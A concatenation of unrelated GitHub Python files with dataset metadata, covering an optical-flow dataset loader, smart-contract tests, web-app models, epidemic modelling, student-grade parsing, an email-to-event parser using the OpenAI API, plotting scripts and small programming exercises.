co_transform=co_flow_and_images_transforms.CenterCrop((384,1024)),\r\n loader=mpisintel_loader, mask=True)\r\n\r\n return train_dataset, test_dataset\r\n\r\n\r\ndef make_allpair_dataset(dataset_dir, split):\r\n images = []\r\n for sub_root in dataset_dir:\r\n # Make sure that the folders exist\r\n if not os.path.isdir(sub_root):\r\n raise ValueError(\"the training directory path that you indicated does not exist !\")\r\n flow_map = os.path.join(sub_root, 'flow.flo')\r\n source_img = os.path.join(sub_root, 'target.png') # source image\r\n target_img = os.path.join(sub_root, 'source.png') # target image\r\n if not (os.path.isfile(source_img) and os.path.isfile(target_img)):\r\n continue\r\n images.append([[source_img, target_img], flow_map])\r\n\r\n return split2list(images, split, default_split=0.95)\r\n\r\n\r\ndef mpi_sintel_allpair(root, dataset=\"sintel_allpair\", source_image_transform=None, target_image_transform=None, \r\n flow_transform=None, co_transform=None, split=None) :\r\n ''' load images from generated sintel all pair dataset.'''\r\n if not os.path.isdir(root): \r\n raise \"(mip sintel_allpair : Invalid path for \" + os.path.join(root, dataset)\r\n\r\n pair_dirs = []\r\n for scene_list in os.listdir(root): # for scene list e.g) alley_1, ambush_4\r\n grand_parent_dir = os.path.join(os.path.join(root, scene_list))\r\n for start_list in os.listdir(grand_parent_dir): \r\n parent_dir = os.path.join(grand_parent_dir, start_list)\r\n for end_list in os.listdir(parent_dir):\r\n pair_dirs.append(os.path.join(parent_dir, end_list))\r\n\r\n train_list, test_list = make_allpair_dataset(pair_dirs, split) \r\n\r\n root = '.'\r\n train_dataset = ListDataset(root, train_list, source_image_transform=source_image_transform,\r\n target_image_transform=target_image_transform, mask=True,\r\n loader=mpisintel_allpair_loader,\r\n flow_transform=flow_transform, co_transform=co_transform)\r\n test_dataset = ListDataset(root, test_list, source_image_transform=source_image_transform,\r\n target_image_transform=target_image_transform, mask=True,\r\n loader=mpisintel_allpair_loader,\r\n flow_transform=flow_transform, co_transform=co_transform)\r\n\r\n return (train_dataset, 
test_dataset)\r\n","repo_name":"DanilKim/dense_correspondence","sub_path":"GLU-Net/datasets/mpisintel.py","file_name":"mpisintel.py","file_ext":"py","file_size_in_byte":9395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38025281080","text":"from hashlib import (\n sha256,\n)\nfrom random import (\n randint,\n)\nimport pytest\nimport eth_utils\nfrom .challenges import challenges\n\n\n@pytest.mark.parametrize(\n 'challenge_no,challenge', challenges.items()\n)\ndef test_check_challenge(rsa_bounty_contract,\n w3,\n challenge_no,\n challenge):\n call = rsa_bounty_contract.functions.challenges(challenge_no)\n modulus, redeemed, bounty = call.call()\n assert not redeemed\n assert bounty == challenge[\"bounty\"]\n assert int.from_bytes(modulus, \"big\") == challenge[\"modulus\"]\n\n\ndef test_challenges_length(rsa_bounty_contract,\n w3):\n call = rsa_bounty_contract.functions.challenges_length()\n num = call.call()\n assert num == len(challenges)\n","repo_name":"dankrad/rsa-bounty","sub_path":"tests/test_check_challenges.py","file_name":"test_check_challenges.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"22605856854","text":"from django.db import models\n\nclass Event(models.Model):\n name = models.CharField(max_length=40)\n organizer = models.ForeignKey(\"Coder\", on_delete=models.CASCADE, related_name='organizer')\n number_of_people = models.IntegerField()\n attendees = models.ManyToManyField(\"Coder\", related_name=\"attended_events\")\n description = models.CharField(max_length=150)\n location = models.CharField(max_length=200)\n type = models.ForeignKey(\"Category\", on_delete=models.CASCADE, related_name='type')\n date = models.DateField()\n likers = models.ManyToManyField(\"Coder\", related_name=\"event_coder_liked\")","repo_name":"Jason720r/Our-Code-Server","sub_path":"ourcodeapi/models/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"27868812169","text":"'''\nEXERCÍCIOS - AULA 5 - PYTHON BÁSICO - SOLYD TREINAMENTOS\nFaça um programa que leia a quantidade de pessoas que serão convidadas para uma festa.\nApós isso, o porgrama irá perguntar o nome de todas as pessoas e colocar numa lista de convidados.\nApós isso, irá imprimir os nomes da lista\n'''\n\nqtConvidados = int(input('Quantas pessoas serão convidadas? 
'))\nlista = []\n\nfor i in range(qtConvidados):\n nome = input('Nome do convidado ' + str(i + 1) + ': ')\n lista.append(nome)\n\nprint('\\nLista de Convidados:')\n \nfor i in range(qtConvidados):\n print(lista[i])\n","repo_name":"csalonso/python-solyd-cursos","sub_path":"ex-aula05.py","file_name":"ex-aula05.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4674090894","text":"import numpy as np\n\nfrom epiforecast.risk_simulator import MasterEquationModelEnsemble\n\nfrom _argparse_init import arguments\nfrom _constants import (start_time,\n community_transmission_rate,\n hospital_transmission_reduction)\nfrom _stochastic_init import transition_rates\nfrom _user_network_init import user_nodes, user_population, user_network, exterior_neighbors\nfrom _network_init import population\n\nfrom _utilities import print_start_of, print_end_of\n\nfrom epiforecast.populations import TransitionRates\nfrom epiforecast.samplers import BetaSampler, GammaSampler\n\n\nprint_start_of(__name__)\n################################################################################\nensemble_size = 100\nn_forward_steps = 1 # minimum amount of steps per time step: forward run\nn_backward_steps = 8 # minimum amount of steps per time step: backward run\n\n# Prior of transition rates ####################################################\nlearn_transition_rates = arguments.params_learn_transition_rates\ntransition_rates_ensemble = []\nif learn_transition_rates == True:\n parameter_str = arguments.params_transition_rates_str.split(',')\n #extract the true rates users, in case we wish to use the true values on the user_network\n transition_rates_for_users = transition_rates[user_nodes]\n user_stochastic_clinical_parameters = transition_rates_for_users.get_clinical_parameters_as_dict()\n for i in range(ensemble_size):\n #transition_rates = TransitionRates.from_samplers(\n # population=user_network.get_node_count(),\n # lp_sampler=GammaSampler(1.7,2.,1.),\n # cip_sampler=GammaSampler(1.5,2.,1.),\n # hip_sampler=GammaSampler(1.5,3.,1.),\n # hf_sampler=BetaSampler(4.,0.036),\n # cmf_sampler=BetaSampler(4.,0.001),\n # hmf_sampler=BetaSampler(4.,0.18)\n #)\n \n transition_rates = TransitionRates.from_samplers(\n population=user_network.get_node_count(),\n lp_sampler=GammaSampler(1.35,2.,1.),\n cip_sampler=GammaSampler(1.1,2.,1.),\n hip_sampler=GammaSampler(1.0,4.,1.),\n hf_sampler=user_stochastic_clinical_parameters['hf'],\n cmf_sampler=user_stochastic_clinical_parameters['cmf'],\n hmf_sampler=user_stochastic_clinical_parameters['hmf']\n )\n \n transition_rates.calculate_from_clinical()\n transition_rates_ensemble.append(transition_rates)\n #transition_rates_particle = transition_rates #[user_nodes]\n #transition_rates_particle.calculate_from_clinical()\n #transition_rates_ensemble.append(transition_rates_particle)\n\nelse:\n parameter_str = None\n for i in range(ensemble_size):\n transition_rates_particle = transition_rates[user_nodes]\n transition_rates_particle.calculate_from_clinical()\n transition_rates_ensemble.append(transition_rates_particle)\n\n# range of transition rates\ntransition_rates_min = {'latent_periods': 2,\n 'community_infection_periods': 1,\n 'hospital_infection_periods': 1,\n 'hospitalization_fraction': 1e-5,\n 'community_mortality_fraction': 0,\n 'hospital_mortality_fraction': 0}\n\ntransition_rates_max = {'latent_periods': 12,\n 'community_infection_periods': 15,\n 'hospital_infection_periods': 10,\n 
'hospitalization_fraction': 0.99999,\n 'community_mortality_fraction': 1,\n 'hospital_mortality_fraction': 1}\n\n# Prior of transmission rate ###################################################\ncommunity_transmission_rate_ensemble = np.full([ensemble_size, user_population],\n community_transmission_rate)\n\n\n\n\nlearn_transmission_rate = arguments.params_learn_transmission_rate\nparam_transform=None\ntransmission_rate_bias = arguments.params_transmission_rate_bias \ntransmission_rate_std = arguments.params_transmission_rate_noise * community_transmission_rate\nif learn_transmission_rate == True:\n \n if param_transform == 'log':\n #see wikipedia for transform!\n community_transmission_rate_ensemble = np.random.lognormal(\n np.log(community_transmission_rate**2/np.sqrt(community_transmission_rate**2 + transmission_rate_std**2)),\n np.sqrt(np.log(1 + transmission_rate_std**2/community_transmission_rate**2)),\n community_transmission_rate_ensemble.shape)\n else:\n community_transmission_rate_ensemble = np.random.normal(\n community_transmission_rate+transmission_rate_bias,\n transmission_rate_std,\n community_transmission_rate_ensemble.shape)\n\n# range of transmission rate\ntransmission_rate_min = 1\ntransmission_rate_max = 20\n\n#exogenous rates - neighbor-weighted:\nif arguments.user_network_external_neighbor_type == 'exact':\n exterior_neighbor_weights = exterior_neighbors\nelif arguments.user_network_external_neighbor_type == 'average':\n exterior_neighbor_weights = np.mean(exterior_neighbors)*np.ones(exterior_neighbors.shape)\nelse:\n raise ValueError(\"unknown method, choose from: exact, average\")\n\n# Set up master equation solver ################################################\nmaster_eqn_ensemble = MasterEquationModelEnsemble(\n population=user_population,\n transition_rates=transition_rates_ensemble,\n transmission_rate_parameters=community_transmission_rate_ensemble,\n hospital_transmission_reduction=hospital_transmission_reduction,\n ensemble_size=ensemble_size,\n exterior_neighbors=exterior_neighbor_weights,\n start_time=start_time,\n parallel_cpu=arguments.parallel_flag,\n num_cpus=arguments.parallel_num_cpus,\n ensemble_correction=arguments.ensemble_closure\n)\n\n\n\n# 6 states\nI_slice = slice( 2*user_population, 3*user_population)\nS_slice = slice( 0,user_population)\nensemble_ic = np.zeros([ensemble_size, 6*user_population])\n\n# 5 states\n#I_slice = slice( user_population, 2*user_population)\n#S_slice = slice( 0,user_population)\n#ensemble_ic = np.zeros([ensemble_size, 5*user_population])\n\n\nensemble_ic[:,I_slice] = np.random.beta(arguments.ic_alpha,\n arguments.ic_beta,\n (ensemble_size, user_population))\n# if excluding S category, then this slice is 0 IC\nensemble_ic[:,S_slice] = 1 - ensemble_ic[:,I_slice]\n\n################################################################################\nprint_end_of(__name__)\n\n","repo_name":"tapios/risk-networks","sub_path":"examples/da-sandbox/_master_eqn_init.py","file_name":"_master_eqn_init.py","file_ext":"py","file_size_in_byte":6699,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"16845716900","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\ndef commonChild(s1, s2):\n\n\n (m, n) = (len(s1), len(s2))\n M = [0 for x in range(m + 2)]\n count=0\n for i in range(1,m+1):\n prev = 0\n for j in range(1,n+1):\n temp = M[j]\n if s1[i-1]==s2[j-1]:\n M[j]=prev+1\n else:\n M[j]=max(M[j],M[j-1])\n prev = temp\n\n return M[n]\n 
\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n s1 = input()\n\n s2 = input()\n\n result = commonChild(s1, s2)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()","repo_name":"HiteshTetarwal/hackerrank","sub_path":"string_manupulation/common_child_strings.py","file_name":"common_child_strings.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25856880467","text":"from typing import TYPE_CHECKING, List\n\nfrom sqlalchemy import BigInteger, ForeignKey\nfrom sqlalchemy.orm import Mapped, mapped_column, relationship\n\nfrom src.db.utils import doc_and_comment\nfrom src.models import Base\nfrom src.models.annotations import bigint_pk\n\nif TYPE_CHECKING:\n from src.models.member import Member\n from src.models.user import User\n\n\nclass Guild(Base):\n \"\"\"Discord guild\"\"\"\n\n __tablename__ = 'guilds'\n __table_args__ = (\n {\n 'comment': __doc__,\n },\n )\n\n id: Mapped[bigint_pk] = mapped_column(\n **doc_and_comment('The guild\\'s unique ID'),\n )\n name: Mapped[str] = mapped_column(\n **doc_and_comment('The guild\\'s name'),\n )\n owner_id: Mapped[int] = mapped_column(\n BigInteger,\n ForeignKey('users.id', ondelete='CASCADE'),\n repr=False,\n )\n owner: Mapped['User'] = relationship(\n back_populates='owner_of',\n lazy='joined',\n innerjoin=True,\n init=False,\n )\n members: Mapped[List['Member']] = relationship(\n back_populates='guild',\n cascade='all, delete-orphan',\n default_factory=list,\n lazy='selectin',\n )\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'owner_id': self.owner_id,\n 'owner': self.owner,\n 'members': self.members,\n }\n","repo_name":"TrashRoach/discord-bot","sub_path":"src/models/guild.py","file_name":"guild.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29926121477","text":"\ndef is_special_array(lst):\n for x in range(len(lst)):\n if x%2 == 0 and lst[x]%2 == 0:\n continue\n elif x%2 != 0 and lst[x]%2 != 0:\n continue\n else:\n return False\n return True\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"BmZ6PGMJiLWMzgvos_19.py","file_name":"BmZ6PGMJiLWMzgvos_19.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"47162923342","text":"import fonctions\r\nimport json\r\nimport xml.etree.ElementTree as ET\r\n#Le travail est divise en deux parties :traiment de donnees et traitement de fichiers\r\n#Traitement fichier a partir du ligne 132\r\n\r\nwith open('/home/khalil/Bureau/python/Projet Python Fichiers/Donnees_Projet_Python_DataC5.csv' , 'r' ,encoding=\"UTF-8\") as f: \r\n eleves=f.read().split(\"\\n\")\r\n del eleves[0]\r\nTab_eleve=[]\r\nfor eleve in eleves :\r\n \r\n e=eleve.split(\",\")\r\n try:\r\n dic_eleves={\r\n \"Code\":e[0],\r\n \"Numero\" :e[1],\r\n \"Nom\":e[2],\r\n \"Prenom\":e[3],\r\n \"Date_nais\":e[4],\r\n \"Classe\":e[5],\r\n \"Note\":e[6]\r\n\r\n }\r\n Tab_eleve.append(dic_eleves)\r\n except IndexError:\r\n \"\" \r\n \r\n#suppression des lignes vides\r\nt=[]\r\nfor eleves in Tab_eleve :\r\n if not eleves['Nom']=='' :\r\n t.append(eleves) \r\n\r\n#Changer format date \r\n#del t[152]['Date_nais'] \r\nfor i in range(len(t)) :\r\n t[i][\"Date_nais\"]=t[i][\"Date_nais\"].lstrip()\r\n for char in t[i][\"Date_nais\"] :\r\n if char in ['-',',',':','_','|','.',' '] :\r\n 
t[i]['Date_nais']=t[i]['Date_nais'].replace(char,\"/\")\r\n \r\n #print(t[i][\"Date_nais\"])\r\n#Changer format Classe\r\nfor i in range(len(t)): \r\n t[i][\"Classe\"]=t[i][\"Classe\"].replace(' ','')\r\n t[i][\"Classe\"]=t[i][\"Classe\"][0]+ \"em\" +t[i][\"Classe\"][-1].capitalize() \r\n \r\n\r\n#Recuperation des notes dans un dictionnnaire \r\nfor i in range(len(t)) :\r\n m=t[i][\"Note\"].split(\"#\")\r\n del t[i][\"Note\"]\r\n dic_matieres={}\r\n t[i][\"matieres\"]={}\r\n for j in m :\r\n j=j.replace(\"[\",\"-\").replace(\"|\",\"-\").replace(\":\",\"-\").replace(\"]\",\"-\").split(\"-\")\r\n try:\r\n dic_matieres[j[0]]={\r\n \"Devoir\":j[1:-2],\r\n \"Examen\":j[-2]\r\n }\r\n #print(dic_matieres) \r\n t[i][\"matieres\"].update(dic_matieres)\r\n #print(t[i]) \r\n #T.append(dic_matieres)\r\n \r\n except IndexError:\r\n pass \r\n\r\ntableau_valide = []\r\ntableau_invalide = []\r\n\r\n#Boucle à travers chaque ligne d'élève\r\nfor eleve in t:\r\n numero = eleve['Numero']\r\n nom=eleve['Nom']\r\n prenom=eleve['Prenom']\r\n date_nais=eleve['Date_nais']\r\n classe=eleve['Classe']\r\n est_valide = True\r\n erreur={}\r\n\r\n # Vérifie si le code est valide\r\n if not fonctions.est_numero_valide(numero):\r\n #print(f\"Le code {code} est invalide car il ne commence pas par un chiffre\")\r\n erreur['numero']= f\"Le numero {numero} est invalide \"\r\n est_valide = False\r\n\r\n # Vérifie si le numéro est valide\r\n if not fonctions.est_prenom_valide(prenom):\r\n erreur['prenom']= f\"Le prenom {prenom} est invalide \"\r\n est_valide = False\r\n if not fonctions.est_nom_valide(nom):\r\n erreur['nom']= f\"Le nom {nom} est invalide \"\r\n est_valide = False \r\n if not fonctions.est_date_valide(date_nais):\r\n erreur['date_nais']= f\"La date {date_nais} est invalide \"\r\n est_valide = False \r\n if not fonctions.est_classe_valide(classe):\r\n erreur['classe']= f\"La classe {classe} est invalide \"\r\n est_valide = False \r\n for mat in eleve['matieres'] :\r\n devoir=eleve['matieres'][str(mat)]['Devoir']\r\n examen=eleve['matieres'][str(mat)]['Examen']\r\n if not fonctions.notes_devoir_valides(devoir) :\r\n erreur['devoir']= f\"La note de devoir {devoir} est invalide \"\r\n est_valide = False \r\n if not fonctions.note_examen_valide(examen) :\r\n erreur['examen']= f\"La note d'examen {examen} est invalide \"\r\n est_valide = False \r\n\r\n eleve[\"erreur\"]=erreur\r\n # Ajoute la ligne d'élève au tableau valide ou invalide\r\n if est_valide:\r\n tableau_valide.append(eleve)\r\n else:\r\n tableau_invalide.append(eleve)\r\n\r\n#Calcul de la moyenne par matiere \r\nfor eleve in tableau_valide :\r\n for matiere, notes in eleve['matieres'].items():\r\n moyenne_matiere = (sum(int(note) for note in notes['Devoir'])/len(notes['Devoir']) + 2*int(notes['Examen']))/3\r\n moyenne_matiere=round(moyenne_matiere,2)\r\n eleve['matieres'][matiere]['Moyenne_matieres'] = moyenne_matiere\r\n# Calcul de la moyenne générale\r\n moyenne_generale = sum([matiere['Moyenne_matieres'] for matiere in eleve['matieres'].values()])/len(eleve['matieres'])\r\n moyenne_generale=round(moyenne_generale,2)\r\n# Ajout de la moyenne générale dans le dictionnaire\r\n eleve['Moyenne_generale'] = moyenne_generale\r\n\r\n#################################################################################\r\n# TRAITEMENT DES FICHIERS\r\n\r\n#print(tableau_valide)\r\n# Demande à l'utilisateur de choisir le format pour les données valides\r\nprint(\"Dans quel format voulez-vous enregistrer les données valides ?\")\r\nprint(\"1. XML\")\r\nprint(\"2. 
JSON\")\r\nchoix = input(\"Votre choix (1 ou 2) : \")\r\n\r\n# Traitement des données valides selon le choix de l'utilisateur\r\nif choix == \"1\":\r\n # Enregistrement des données valides en XML\r\n racine = ET.Element(\"eleves\")\r\n for eleve in tableau_valide:\r\n #La SubElement()fonction permet de créer de nouveaux sous-éléments pour un élément donné \r\n elt_eleve = ET.SubElement(racine, \"eleve\")\r\n for cle, valeur in eleve.items():\r\n #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n elt_attribut = ET.SubElement(elt_eleve, cle)\r\n elt_attribut.text = str(valeur)\r\n arbre = ET.ElementTree(racine)\r\n arbre.write(\"valides.xml\", encoding=\"UTF-8\")\r\n print(\"Les données valides ont été enregistrées dans le fichier valides.xml\")\r\nelse:\r\n # Enregistrement des données valides en JSON\r\n with open(\"valides.json\", \"w\", encoding=\"UTF-8\") as f:\r\n json.dump(tableau_valide, f, indent=4)\r\n print(\"Les données valides ont été enregistrées dans le fichier valides.json\")\r\n\r\n# Demande à l'utilisateur de choisir le format pour les données invalides\r\nprint(\"Dans quel format voulez-vous enregistrer les données invalides ?\")\r\nprint(\"1. XML\")\r\nprint(\"2. JSON\")\r\nchoix = input(\"Votre choix (1 ou 2) : \")\r\n\r\n# Traitement des données invalides selon le choix de l'utilisateur\r\nif choix == \"1\":\r\n # Enregistrement des données invalides en XML\r\n racine = ET.Element(\"eleves\")\r\n for eleve in tableau_invalide:\r\n elt_eleve = ET.SubElement(racine, \"eleve\")\r\n for cle, valeur in eleve.items():\r\n elt_attribut = ET.SubElement(elt_eleve, cle)\r\n elt_attribut.text = str(valeur)\r\n arbre = ET.ElementTree(racine)\r\n arbre.write(\"invalides.xml\", encoding=\"UTF-8\")\r\n print(\"Les données invalides ont été enregistrées dans le fichier invalides.xml\")\r\nelse:\r\n # Enregistrement des données invalides en JSON\r\n with open(\"invalides.json\", \"w\", encoding=\"UTF-8\") as f:\r\n json.dump(tableau_invalide, f, indent=4)\r\n print(\"Les données invalides ont été enregistrées dans le fichier invalides.json\")\r\n \r\n","repo_name":"khalil6c/Dev_DATA_P5_Ibrahima_Khalil_CISSE","sub_path":"P5_Python_MIC003_Fichiers/main_fichiers.py","file_name":"main_fichiers.py","file_ext":"py","file_size_in_byte":7479,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41107848917","text":"import json\nimport re\n\nfrom config import OPENAI_API_KEY\nfrom constants import PARSE_SYS_TEMPLATE, PARSE_USER_TEMPLATE, SYS_SANS_CONFIDENCE, COMBINED_TEMPLATE\nfrom openai_wrappers import OpenAIWrapper\nfrom parse_utils import (\n ParseField,\n format_field_list,\n # remove_punctuation\n)\n\nopenai_wrapper = OpenAIWrapper(OPENAI_API_KEY)\n\nIS_FF_EVENT_FIELD = ParseField(\"is_free_food_event\", \"Whether the email describes an event with free food\", \"boolean\")\nIS_EVENT_FIELD = ParseField(\"is_event\", \"Is this email is an event invitation\", \"boolean\")\nNAME_FIELD = ParseField(\"name\", \"The name of the event\", \"string\")\nSTART_FIELD = ParseField(\"start\", \"The start date and time of the event\", \"Date\")\nEND_FIELD = ParseField(\"end\", \"The end date and time of the event\", \"Date\")\nLOCATION_FIELD = ParseField(\"location\", \"The location of the event\", \"string\")\nFOOD_TYPE_FIELD = ParseField(\"food_type\", \"The type of food at the event\", \"string\")\nFF_FIELD_LIST = [IS_FF_EVENT_FIELD, NAME_FIELD, START_FIELD, END_FIELD, LOCATION_FIELD, 
FOOD_TYPE_FIELD]\nIC_FIELD_LIST = [IS_EVENT_FIELD, NAME_FIELD, START_FIELD, END_FIELD, LOCATION_FIELD]\n\ndef remove_links(text):\n    \"\"\"\n    - Define a regular expression pattern to match links\n    - Use the re.sub() function to replace all matches of the link pattern with an empty string\n\n    \"\"\"\n    # NOTE: the original pattern was lost; a plain http(s) URL matcher is\n    # assumed here -- adjust if links appear in another form.\n    link_pattern = r'https?://\\S+'\n    return re.sub(link_pattern, '', text)\n\ndef remove_email_addresses(text):\n    email_address_pattern = r'<\\S+@\\S+>'\n    return re.sub(email_address_pattern, '', text)\n\ndef truncate_email(email, max_words):\n    return ' '.join(email.split()[:max_words])\n\ndef extract_fields(txt, fields=FF_FIELD_LIST, max_tokens=300):\n    # prepare prompt\n    string_fields = format_field_list(fields)\n    # chat_history = [\n    #     { \n    #         \"role\": \"system\", \n    #         # \"content\": PARSE_SYS_TEMPLATE.format(string_fields=string_fields)\n    #         \"content\": SYS_SANS_CONFIDENCE.format(string_fields=string_fields)\n    #     },\n    #     {\n    #         \"role\": \"user\",\n    #         \"content\": PARSE_USER_TEMPLATE.format(document=txt)\n    #     }\n    # ]\n    chat_history = [{\"role\": \"user\", \"content\": COMBINED_TEMPLATE.format(document=txt, string_fields=string_fields)}]\n    \n    # extract info\n    completion = openai_wrapper.chat_gpt_completion(chat_history, max_tokens=max_tokens)\n\n    # try to parse the expected JSON format\n    try:\n        if isinstance(completion, str):\n            completion = json.loads(completion)\n        else:\n            completion = json.loads(completion[0])\n    except json.JSONDecodeError as e:\n        print(completion)\n        raise e\n\n    # handle non-str \n    # is_ff_event = remove_punctuation(completion[\"is_free_food_event\"]).lower() == \"true\"\n    # completion[\"is_free_food_event\"] = is_ff_event\n\n    return completion\n\ndef summarize_email(txt, max_tokens=300):\n    chat_history = [\n        {\n            \"role\": \"user\",\n            \"content\": f\"Email:\\n{txt}\\n---\\nPlease write a 2 sentence summary of this email.\"\n        }\n    ]\n    summary = openai_wrapper.chat_gpt_completion(chat_history, max_tokens=max_tokens)\n    return summary\n","repo_name":"matt-seb-ho/free_food_owo","sub_path":"src/parse_email.py","file_name":"parse_email.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70200352411","text":"# %%\nimport os\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nos.chdir('/Users/au582299/Desktop/dm/decision-making-tweak/politicians_sweden')\n\ndf = pd.read_csv('dat/data_recoded.csv')\nfig_outdir = 'fig/exploratory'\n\n###\n### Satisfied polls \n###\n# %%\nf = sns.barplot(\n    x=df['sex'],\n    y=df['Satisfied_polls'],\n    hue=df['Treatment_polls']\n)\n\nf.get_figure().savefig(os.path.join(fig_outdir, 'sex_satisfied.png'))\n\n\n# %%\nf = sns.barplot(\n    x=df['edu'],\n    y=df['Satisfied_polls'],\n    hue=df['Treatment_polls']\n)\n\nf.get_figure().savefig(os.path.join(fig_outdir, 'edu_satisfied.png'))\n\n\n# %%\nplt.figure(figsize=(15, 8))\nf = sns.barplot(\n    x=df['party_combined'],\n    y=df['Satisfied_polls'],\n    hue=df['Treatment_polls']\n)\n\nf.get_figure().savefig(os.path.join(fig_outdir, 'party_satisfied.png'))\n\n\n# %%\n###\n### Change overall\n###\nf = sns.barplot(\n    x=df['sex'],\n    y=df['Change_policy_overall'],\n    hue=df['Treatment_polls']\n)\n\nf.get_figure().savefig(os.path.join(fig_outdir, 'sex_change.png'))\n\n\n# %%\nf = sns.barplot(\n    x=df['edu'],\n    y=df['Change_policy_overall'],\n    hue=df['Treatment_polls']\n)\n\nf.get_figure().savefig(os.path.join(fig_outdir, 'edu_change.png'))\n\n\n# %%\nplt.figure(figsize=(15, 8))\nf = sns.barplot(\n    x=df['party_combined'],\n    
y=df['Change_policy_overall'],\n hue=df['Treatment_polls']\n)\n\nf.get_figure().savefig(os.path.join(fig_outdir, 'party_change.png'))\n\n\n# %%\n# party close\nsns.distplot(\n x=df['party_close_rec']\n)\n\n# %%\nsns.barplot(\n x=df['party_close_h14'].astype('str')\n)\n# %%\ndf['party_close_str'] = df['party_close_h14'].astype(str)\ndf.groupby('party_close_str')['party_close_str'].value_counts()\n\n# %%\nplt.figure(figsize=(15, 8))\nf = sns.violinplot(\n x=df['party_close_str'],\n y=df['Satisfied_polls'],\n hue=df['Treatment_polls'],\n order=[\"1.0\", \"2.0\", \"3.0\", \"4.0\", \"nan\"]\n)\n\n# %%\n","repo_name":"jankounchained/swedish-politicians-abm","sub_path":"src/study_data/barplots.py","file_name":"barplots.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30129840557","text":"\"\"\"\r\n\n\nCreate a function that takes an integer list and return the biggest between\n**positive** sum, **negative** sum, or **0s** count. The major is understood\nas the greatest absolute.\n\n`l = [1,2,3,4,0,0,-3,-2]`, the function has to return `10`, because:\n\n * Positive sum = 1+2+3+4 = 10\n * Negative sum = (-3)+(-2) = -5\n * 0s count = 2 (there are two zeros in list)\n\n### Examples\n\n major_sum([1, 2, 3, 4, 0, 0, -3, -2]) ➞ 10\n \n major_sum([-4, -8, -12, -3, 4, 7, 1, 3, 0, 0, 0, 0]) ➞ -27\n \n major_sum([0, 0, 0, 0, 0, 1, 2, -3]) ➞ 5\n # Because -3 < 1+2 < 0sCount = 5\n\n### Notes\n\n * All numbers are integers.\n * There aren't empty lists.\n * All tests are made to return only one value.\n\n\"\"\"\r\n\ndef major_sum(lst):\n pos = sum(i for i in lst if i>0)\n neg = sum(i for i in lst if i < 0)\n zeros = sum(1 for i in lst if i == 0)\n res = max(pos, abs(neg), zeros)\n return pos if res==pos else neg if res == abs(neg) else zeros\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"kiX7WjSFeTmBYcEgK_16.py","file_name":"kiX7WjSFeTmBYcEgK_16.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23459087191","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 22 18:28:04 2020\r\n\r\n@author: avkgu\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport csv\r\nfrom datetime import datetime, timedelta\r\nimport numpy as np\r\nfrom sklearn import preprocessing\r\nfrom sklearn.decomposition import PCA\r\nimport scipy.stats\r\nimport pandas as pd # Import pandas for data manipulation/handling\r\nimport numpy as np # Import numpy for number processing\r\nfrom pandas.plotting import scatter_matrix # Used for plotting scatter matrix\r\nimport matplotlib # Need to import matplotlib\r\nimport matplotlib.pyplot as plt # Used to plot\r\nfrom sklearn import model_selection\r\nfrom scipy.integrate import simps\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn import model_selection\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.model_selection import KFold \r\nfrom sklearn.model_selection import cross_val_score\r\nimport pickle\r\nfrom sklearn.cluster import KMeans,DBSCAN\r\n\r\n###########################################\r\n#read csv file\r\n##########################################\r\ndf = pd.read_csv('CGMData.csv',\r\n usecols=['Date','Time','Sensor Glucose (mg/dL)'])\r\n\r\ndf1 = pd.read_csv('InsulinData.csv',\r\n usecols=['Date','Time','BWZ Carb Input (grams)'])\r\n\r\ndf['Date'] = pd.to_datetime(df['Date'])\r\n\r\ndf['Date'] = 
